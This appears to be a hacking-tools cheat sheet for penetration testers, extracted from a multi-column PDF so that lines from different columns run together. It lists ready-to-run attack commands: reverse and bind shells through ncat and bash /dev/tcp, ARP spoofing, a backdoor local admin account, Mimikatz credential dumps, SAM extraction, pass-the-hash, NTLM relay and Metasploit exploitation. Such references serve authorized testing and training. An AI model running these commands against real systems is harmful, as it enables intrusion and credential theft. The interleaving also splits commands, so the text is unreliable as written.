Hacking Tools Cheat Sheet cert.pem --ssl-key key.

pem
Connect to TLS service:
# tcpdump [options] [filters]
Useful tcpdump options:
10.5.23.0/24
Useful nmap options:
# ncat --ssl 10.5.23.42 1337 • -i interface: Interface or any for all • -n: Disable name and port resolution
Basic Linux Networking Tools Connect to TLS service using openssl: • -n: Disable name and port resolution • -PR: ARP host discovery
Show IP configuration:
# openssl s_client -connect • -A: Print in ASCII • -Pn: Disable host discovery
# ip a lw
10.5.23.42:1337 • -XX: Print in hex and ASCII • -sn: Disable port scan (host discovery
Change IP/MAC address:
Show certificate details: • -w file: Write output PCAP file only)
# ip link set dev eth0 down
# openssl s_client -connect • -r file: Read PCAP file • -sS/-sT/-sU: SYN/TCP connect/UDP scan
# macchanger -m 23:05:13:37:42:21 eth0
10.5.23.42:1337 | openssl x509 -text Useful tcpdump filters: • --top-ports 50: Scan 50 top ports
# ip link set dev eth0 up
Test TLS server certificate and ciphers: • not arp: No ARP packets • -iL file: Host input file
Static IP address configuration:
# sslyze --regular 10.5.23.42:443 • port ftp or port 23: Only port 21 or 23 • -oA file: Write output files (3 types)
# ip addr add 10.5.23.42/24 dev eth0
TCP to TLS proxy: • host 10.5.23.31: Only from/to host • -sC: Script scan (default scripts)
DNS lookup:
# socat TCP-LISTEN:2305,fork,reuseaddr • net 10.5.23.0/24: Only from/to hosts in • --script <file/category>: Specific scripts
# dig compass-security.com
ssl:example.com:443 network • -sV: Version detection
Reverse DNS lookup:
Online TLS tests: Advanced sniffing using tshark or Wireshark. • -6: IPv6 scan
# dig -x 10.5.23.42
• ssllabs.com, hardenize.com Sniffing over SSH on a remote host: The target can be specified using CIDR nota-
# ssh 10.5.23.42 tcpdump -w- port not tion
Information Gathering HTTP Tools ssh | wireshark -k -i - (10.5.23.0/24) or range definitions (10.13-
Find owner/contact of domain or IP address: Start Python webserver on port 2305: Search in network traffic: 37.5.1-23).
# whois compass-security.com # python3 -m http.server 2305 # ngrep -i password Fast scan using masscan:
Get nameservers and test for DNS zone Perform HTTP Request: Show HTTP GET requests: # masscan -p80,8000-8100 --rate 20000
transfer: # curl http://10.5.23.42:2305/?foo=bar # urlsnarf 10.0.0.0/8
# dig example.com ns Useful curl options: Show transmitted images: Public internet scan databases:
# dig example.com axfr @n1.example.com • -k: Accept untrusted certificates # driftnet • shodan.io, censys.io
Get hostnames from CT logs: Search for • -d “foo=bar”: HTTP POST data
%.compass-security.com on https://crt.sh. • -H: “Foo: Bar”: HTTP header Network Scanning Shells
Or using an nmap script: • -I: Perform HEAD request ARP Scan: Start bind shell (on victim):
# nmap -sn -Pn compass-security.com • -L: Follow redirects # nmap -n -sn -PR 10.5.23.0/24 # ncat -l -p 2305 -e “/bin/bash -i”
--script hostmap-crtsh • -o foobar.html: Write output file Reverse DNS lookup of IP range: Connect to bind shell (on attacker):
Combine various sources for subdomain • --proxy http://127.0.0.1:8080: Set proxy # nmap -sL 10.5.23.0/24 # ncat 10.5.23.42 2305
enum: Scan for common files/applications/configs: Nmap host discovery (ARP, ICMP, SYN 443/tcp, Listen for reverse shell (on attacker):
# amass enum -src -brute -min-forrecursive # nikto -host https://example.net ACK 80/tcp): # ncat -l -p 23
2 -d compass-security.com Enumerate common directory-/filenames: # nmap -sn -n 10.5.23.0/24 Start reverse shell (on victim):
# gobuster dir -k -u TCP scan (SYN scan = half-open scan): # ncat -e “/bin/bash -i” 10.5.23.5 23
TCP Tools https://example.net -w # nmap -Pn -n -sS -p Start reverse shell with bash only (on vic-
Listen on TCP port: /usr/share/wordlists/dirb/common.txt 22,25,80,443,8080 10.5.23.0/24 tim):
# ncat -l -p 1337 List Nmap scripts: # bash -i &>/dev/tcp/10.5.23.5/42 0>&1
Connect to TCP port: Sniffing # ls /usr/share/nmap/scripts Upgrade to pseudo terminal:
# ncat 10.5.23.42 1337 ARP spoofing: Scan for EternalBlue vulnerable hosts: # python -c ‘import pty;
# arpspoof -t 10.5.23.42 10.5.23.1 # nmap -n -Pn -p 443 --script smbvuln- pty.spawn(“/bin/bash”)’
TLS Tools Or a graphical tool: ms17-010 10.5.23.0/24
Create self-signed certificate: # ettercap -G Scan for vulnerabilities (script category filter):
# openssl req -x509 -newkey rsa:2048 Show ARP cache: # nmap -n -Pn --script “vuln and safe”
-keyout key.pem -out cert.pem -nodes # ip neigh 10.5.23.0/24
-subj “/CN=example.org/” Delete ARP cache: Performance Tuning (1 SYN packet ≈ 60 bytes
Start TLS Server: # ip neigh flush all → 20’000 packets/s ≈ 10 Mbps):
# ncat --ssl -l -p 1337 --ssl-cert Sniff traffic: # nmap -n -Pn --min-rate 20000
Vulnerability DBs and Exploits Upgrade to Meterpreter (or press ^Z(Ctrl-Z)): fia/PowerSploit” into PowerShell to windows/meterpreter/reverse_tcp
background
Exploit search (local copy of the Exploit-DB): bypass ExecutionPolicy and execute Invoke- msf > set LHOST 10.5.23.42 # attacker
# searchsploit apache Background session 1? [y/N] y AllChecks. Use the abuse functions. msf > set LPORT 443
Show exploit file path and copy it into clip-> sessions # list sessions Add a new local admin: msf > set RHOST 10.5.23.21 # victim
board: > sessions -u 1 # Upgrade C:\> net user backdoor P@ssw0rd23 msf > set SMBPass 01[...]03:01[...]03
# searchsploit -p 40142 > sessions 2 # interact with session 2 C:\> net localgroup Administrators backdoor / msf > exploit
Online vulnerability and exploit databases: meterpreter > sysinfo # use it add meterpreter > shell
• cvedetails.com, exploit-db.com, Upload / download files: Scan for network shares: C:\WINDOWS\system32>
packetstormsecurity.com meterpreter > upload pwn.exe # smbmap.py --host-file smbhosts.txt -
meterpreter > download c:\keepass.kdb u Administrator -p PasswordOrHash NTLM Relay
Cracking Execute a file: Vulnerable if message_signing: disabled:
Try SSH passwords from a wordlist: meterpreter > execute -i -f /your/bin Windows Credentials Gathering # nmap -n -Pn -p 445 --script smbsecurity-
# ncrack -p 22 --user root -P Port forwarding to localhost: Start Mimikatz and create log file: mode 10.5.23.0/24
./passwords.txt 10.5.23.0/24 meterpreter > portfwd add -l 2323 -p C:\>mimikatz.exe Disable SMB and HTTP in Responder.conf
Determine hash type: 3389 -r 10.5.23.23 # privilege::debug and start Responder:
# hashid 869d[...]bd88 Background Meterpreter session: # log C:\tmp\mimikatz.log # ./Responder.py -I eth0
Show example hash types for hashcat: meterpreter > background Read lsass.exe process dump: NTLM Relay to target and extract SAM file:
# hashcat --example-hashes Pivoting through existing Meterpreter ses- # sekurlsa::minidump lsass.dmp # ./ntlmrelayx.py -smb2support -t
Crack hashes (e.g. 5600 for NetNTLMv2 type): sion: Dump lsass.exe in taskmgr or procdump. smb://10.5.23.42
# hashcat -m 5600 -a 0 hash.txt > use post/multi/manage/autoroute Show passwords/hashes of logged in users: NTLM Relay using socks proxy:
/path/to/wordlists/* > set session 2 # meterpreter session # sekurlsa::logonpasswords # ./ntlmrelayx.py -tf targets.txt
Crack hashes using John the Ripper: > run Backup SYSTEM & SAM hive: -smb2support -socks
# john hashes.txt > route C:\>reg save HKLM\SYSTEM system.hiv Configure ProxyChains:
SOCKS via Meterpreter (requires autoroute): C:\>reg save HKLM\SAM sam.hiv # vi /etc/proxychains.conf
> use auxiliary/server/socks4a Extract hashes using Mimikatz: [...]
Metasploit Framework > set SRVPORT 8080
Start Metasploit: # lsadump::sam /system:system.hiv socks4 127.0.0.1 1080
> run /sam:sam.hiv Access files via SOCKS proxy:
# msfconsole
Configure ProxyChains: # proxychains smbclient -m smb3
Search exploit:
# vi /etc/proxychains.conf Pass-the-Hash ‘\\10.5.23.42\C$’ -W pc05 -U
> search eternalblue
[...] Shell via pass-the-hash (Impacket Tools): Administrator%invalidPwd
Use exploit:
socks4 127.0.0.1 1080 # ./psexec.py -hashes
msf > use exploit/windows/smb/ms17_…
Connect through SOCKS proxy: :011AD41795657A8ED80AB3FF6F078D03 Active Directory
Configure exploit:
# proxychains ncat 172.23.5.42 1337 domain/username@10.5.23.42 Use SharpHound to gather information and
msf exploit(…) > show options
msf exploit(…) > set TARGET 10.5.23.42 Over a subnet and extract SAM file: import
Run exploit: Linux Privilege Escalation # crackmapexec -u Administrator -H into Bloodhound to analyze.
msf exploit(…) > exploit Enumerate local information (-t for more :011AD41795657A8ED80AB3FF6F078D03 Download PingCastle from pingcastle.com
Generate reverse shell (WAR): tests): 10.5.23.0/24 --sam and
# msfvenom -p # curl -o /tmp/linenum Browse shares via pass-the-hash: generate Report.
java/jsp_shell_reverse_tcp LHOST=<your https://raw.githubusercontent.com/rebo # ./smbclient.py
ip address> LPORT=443 -f war > sh.war otuser/LinEnum/master/LinEnum.sh domain/usrname@10.5.23.42 -hashes More Online References
Reverse shell listener: # bash /tmp/linenum -r /tmp/report :011AD41795657A8ED80AB3FF6F078D03 • GitHub “swisskyrepo/PayloadsAllTheTh-
> use exploit/multi/handler Other hardening checks can be done using lynis RDP via pass-the-hash: ings”
> set payload or LinPEAS. # xfreerdp /u:user /d:domain /pth: • GitHub “danielmiessler/SecLists
linux/x64/shell_reverse_tcp Use sudo/SUID/capabilities/etc. exploits from 011AD41795657A8ED80AB3FF6F078D03 • GitHub “enaqx/awesome-pentest”
> set LHOST 10.5.23.42 # attacker gtfobins.github.io. /v:10.5.23.42
> set LPORT 443 Windows Privilege Escalation Meterpreter via pass-the-hash:
FindmoreStationXCheatSheetshere-
> exploit Copy PowerUp.ps1 from GitHub “PowerShellMa- msf > set payload
https://www.stationx.net/category/ch
e a t - s h e e ts /